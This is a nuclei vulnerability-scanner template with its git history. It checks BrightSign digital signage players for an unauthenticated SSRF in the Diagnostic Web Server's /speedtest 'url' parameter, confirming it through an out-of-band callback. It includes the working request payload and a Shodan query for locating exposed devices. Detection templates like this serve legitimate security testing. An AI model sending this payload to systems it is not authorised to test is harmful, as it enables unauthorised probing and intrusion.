nuclei-templates/http/vulnerabilities/other/brightsign-dsdws-ssrf.yaml

32 lines
1.1 KiB
YAML
Raw Normal View History

2022-08-31 09:55:56 +00:00
id: brightsign-dsdws-ssrf
info:
name: BrightSign Digital Signage Diagnostic Web Server 8.2.26 Unauthenticated - SSRF
author: 0x_Akoko
severity: medium
description: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the BrightSign digital signage media player affecting the Diagnostic Web Server (DWS). The application parses user supplied data in the 'url' GET parameter to construct a diagnostics request to the Download Speed Test service.
reference:
- https://brightsign.zendesk.com/hc/en-us/articles/360056180694-Regarding-Advisory-ID-ZSL-2020-5595
- https://www.zeroscience.mk/codes/brightsign_ssrf.txt
2022-09-02 06:00:44 +00:00
metadata:
max-request: 1
2022-09-02 06:00:44 +00:00
verified: true
shodan-query: title:"BrightSign"
2022-09-05 19:11:39 +00:00
tags: ssrf,brightsign,unauth
2022-08-31 09:55:56 +00:00
http:
2022-08-31 09:55:56 +00:00
- method: GET
path:
- '{{BaseURL}}/speedtest?url={{interactsh-url}}'
2022-09-05 19:11:39 +00:00
matchers-condition: and
2022-08-31 09:55:56 +00:00
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
2022-09-05 19:11:39 +00:00
- type: dsl
dsl:
2023-03-10 14:40:06 +00:00
- 'contains(body_1, "Downloaded")'